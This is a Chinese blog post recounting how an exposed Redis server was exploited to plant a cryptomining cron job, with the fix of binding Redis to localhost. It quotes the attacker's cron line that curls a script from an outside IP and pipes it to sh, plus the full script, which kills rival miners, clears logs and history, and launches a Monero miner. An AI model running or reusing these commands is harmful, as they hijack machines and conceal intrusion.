redis 漏洞導(dǎo)致被挖礦

date: 2017-8-4 17:28:59
title: redis 漏洞導(dǎo)致被挖礦

事件回顧

Redis Desktop Manager 連接我在 aliyun 上的機器,突然發(fā)現(xiàn)多了一個鍵:

get agjriuqpxa
*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh

訪問 http://98.142.140.13:8220/test11.sh

#!/bin/bash
(ps auxf|grep -v grep|grep stratum |awk '{print $2}'|xargs kill -9;crontab -r;pkill -9 minerd;pkill -9 i586;pkill -9 gddr;pkill -9 yam;echo > /var/log/wtmp;history -c;cd ~;curl -L http://98.142.140.13:8220/minerd -o minerd;chmod +x minerd;setsid /root/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)

分析可知:

  • 通過配置 crontab,下載 sh 腳本
  • sh 腳本中下載挖礦文件 minerd,然后運行

事件分析

redis 漏洞,可以回寫數(shù)據(jù)到本地文件,這樣就可以做很多事了:比如上面這樣,新增一個 crontab 來挖礦

how

這已經(jīng)是第三次經(jīng)歷挖礦了,第一次和第二次都是公司的 aliyun 測試機,大家發(fā)現(xiàn) cpu 跑滿,top 后發(fā)現(xiàn)了挖礦腳本。第一次清理了 crontab(包括用戶的和系統(tǒng)的),知道第二次再次出現(xiàn),才定位到是redis的漏洞。

處理辦法:

  • 公司是修改 redis.conf,添加 bind 127.0.0.1
  • 我 aliyun 上使用 docker 來部署的環(huán)境,所以上面 crontab 中的命令根本 跑不起來
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • ** 一、漏洞描述和危害 **Redis因配置不當(dāng)可以未授權(quán)訪問,被攻擊者惡意利用。攻擊者無需認(rèn)證訪問到內(nèi)部數(shù)據(jù),...
    是Jonathan閱讀 7,802評論 0 2
  • Linux定時任務(wù)Crontab命令詳解 linux 系統(tǒng)則是由 cron (crond) 這個系統(tǒng)服務(wù)來控制的。...
    孫燕超閱讀 1,834評論 0 4
  • Linux定時任務(wù)Crontab命令詳解linux 系統(tǒng)則是由 cron (crond) 這個系統(tǒng)服務(wù)來控制的。L...
    時待吾閱讀 409評論 0 0
  • 奶奶半夜三更睡不著,就看你的照片和視頻,從你出生第二天,奶奶抱著你的那張看起,到學(xué)爬,到你蹣跚學(xué)步,到你穩(wěn)當(dāng)?shù)匦凶?..
    寒江雪810閱讀 323評論 0 0